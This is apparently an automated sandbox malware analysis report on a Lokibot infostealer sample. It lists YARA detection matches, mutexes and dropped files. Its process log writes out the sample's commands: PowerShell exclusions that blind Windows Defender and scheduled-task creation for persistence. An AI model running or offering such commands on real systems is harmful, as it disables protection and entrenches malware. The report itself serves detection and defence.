                Source: 0000000A.00000002.1573168768.00000000028B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 0000000A.00000002.1573168768.00000000028B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 0000000A.00000002.1573168768.00000000028B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 00000000.00000002.1452870613.0000000002CA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 00000000.00000002.1452870613.0000000002CA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 00000000.00000002.1452870613.0000000002CA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: Process Memory Space: kzQ25HVUbf.exe PID: 7568, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: Process Memory Space: iWEWjTXiqXke.exe PID: 8176, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: Process Memory Space: iWEWjTXiqXke.exe PID: 616, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeCode function: 0_2_0128D3A40_2_0128D3A4
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeCode function: 0_2_0A7D04D00_2_0A7D04D0
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeCode function: 0_2_0A7D10880_2_0A7D1088
                Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exeCode function: 10_2_00CAD3A410_2_00CAD3A4
                Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exeCode function: 18_2_0040549C18_2_0040549C
                Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exeCode function: 18_2_004029D418_2_004029D4
                Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exeCode function: String function: 0041219C appears 45 times
                Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exeCode function: String function: 00405B6F appears 42 times
                Source: kzQ25HVUbf.exe, 00000000.00000000.1346020412.00000000008C2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameDJsZ.exe6 vs kzQ25HVUbf.exe
                Source: kzQ25HVUbf.exe, 00000000.00000002.1452870613.0000000002D21000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs kzQ25HVUbf.exe
                Source: kzQ25HVUbf.exe, 00000000.00000002.1458431204.0000000003D60000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs kzQ25HVUbf.exe
                Source: kzQ25HVUbf.exe, 00000000.00000002.1443326979.0000000000FAE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs kzQ25HVUbf.exe
                Source: kzQ25HVUbf.exe, 00000000.00000002.1473618044.000000000721B000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs kzQ25HVUbf.exe
                Source: kzQ25HVUbf.exe, 00000000.00000002.1458431204.0000000003F21000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs kzQ25HVUbf.exe
                Source: kzQ25HVUbf.exe, 00000000.00000002.1469707572.00000000054B0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs kzQ25HVUbf.exe
                Source: kzQ25HVUbf.exeBinary or memory string: OriginalFilenameDJsZ.exe6 vs kzQ25HVUbf.exe
                Source: kzQ25HVUbf.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 0.2.kzQ25HVUbf.exe.3d464e8.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 0.2.kzQ25HVUbf.exe.3d464e8.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 0.2.kzQ25HVUbf.exe.3d464e8.3.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 0.2.kzQ25HVUbf.exe.3d464e8.3.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 0.2.kzQ25HVUbf.exe.3d464e8.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 0.2.kzQ25HVUbf.exe.3cc1d60.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 0.2.kzQ25HVUbf.exe.3cc1d60.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 0.2.kzQ25HVUbf.exe.3cc1d60.5.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 0.2.kzQ25HVUbf.exe.3cc1d60.5.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 18.2.iWEWjTXiqXke.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 18.2.iWEWjTXiqXke.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 18.2.iWEWjTXiqXke.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 18.2.iWEWjTXiqXke.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 18.2.iWEWjTXiqXke.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 0.2.kzQ25HVUbf.exe.3cc1d60.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 0.2.kzQ25HVUbf.exe.3cc1d60.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 0.2.kzQ25HVUbf.exe.3cc1d60.5.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 0.2.kzQ25HVUbf.exe.3cc1d60.5.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 0.2.kzQ25HVUbf.exe.3cc1d60.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 18.2.iWEWjTXiqXke.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 18.2.iWEWjTXiqXke.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 18.2.iWEWjTXiqXke.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 18.2.iWEWjTXiqXke.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 18.2.iWEWjTXiqXke.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 0.2.kzQ25HVUbf.exe.3d464e8.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 0.2.kzQ25HVUbf.exe.3d464e8.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 0.2.kzQ25HVUbf.exe.3d464e8.3.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 0.2.kzQ25HVUbf.exe.3d464e8.3.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 00000000.00000002.1458431204.0000000003CA9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 00000000.00000002.1458431204.0000000003CA9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 00000000.00000002.1458431204.0000000003CA9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 00000000.00000002.1458431204.0000000003CE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 00000000.00000002.1458431204.0000000003CE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 00000000.00000002.1458431204.0000000003CE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 00000012.00000002.1569686027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 00000012.00000002.1569686027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 00000012.00000002.1569686027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 00000012.00000002.1569686027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 00000012.00000002.1569686027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 0000000A.00000002.1573168768.00000000028B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 0000000A.00000002.1573168768.00000000028B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 0000000A.00000002.1573168768.00000000028B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 00000000.00000002.1452870613.0000000002CA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 00000000.00000002.1452870613.0000000002CA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 00000000.00000002.1452870613.0000000002CA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: Process Memory Space: kzQ25HVUbf.exe PID: 7568, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: Process Memory Space: iWEWjTXiqXke.exe PID: 8176, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: Process Memory Space: iWEWjTXiqXke.exe PID: 616, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: kzQ25HVUbf.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: iWEWjTXiqXke.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@21/17@0/1
                Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exeCode function: 18_2_0040434D CoInitialize,CoCreateInstance,VariantInit,SysAllocString,VariantInit,VariantInit,SysAllocString,VariantInit,SysFreeString,SysFreeString,CoUninitialize,18_2_0040434D
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeFile created: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exeJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeMutant created: \Sessions\1\BaseNamedObjects\FDD42EE188E931437F4FBE2C
                Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exeMutant created: NULL
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7972:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7880:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7832:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6848:120:WilError_03
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeFile created: C:\Users\user\AppData\Local\Temp\tmp53FD.tmpJump to behavior
                Source: kzQ25HVUbf.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: kzQ25HVUbf.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: kzQ25HVUbf.exeReversingLabs: Detection: 65%
                Source: kzQ25HVUbf.exeVirustotal: Detection: 73%
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeFile read: C:\Users\user\Desktop\kzQ25HVUbf.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\kzQ25HVUbf.exe "C:\Users\user\Desktop\kzQ25HVUbf.exe"
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\kzQ25HVUbf.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\iWEWjTXiqXke" /XML "C:\Users\user\AppData\Local\Temp\tmp53FD.tmp"
                Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeProcess created: C:\Users\user\Desktop\kzQ25HVUbf.exe "C:\Users\user\Desktop\kzQ25HVUbf.exe"
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\iWEWjTXiqXke" /XML "C:\Users\user\AppData\Local\Temp\tmp851F.tmp"
                Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exeProcess created: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe "C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe"
                Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exeProcess created: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe "C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe"
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\kzQ25HVUbf.exe"Jump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe"Jump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\iWEWjTXiqXke" /XML "C:\Users\user\AppData\Local\Temp\tmp53FD.tmp"Jump to behavior
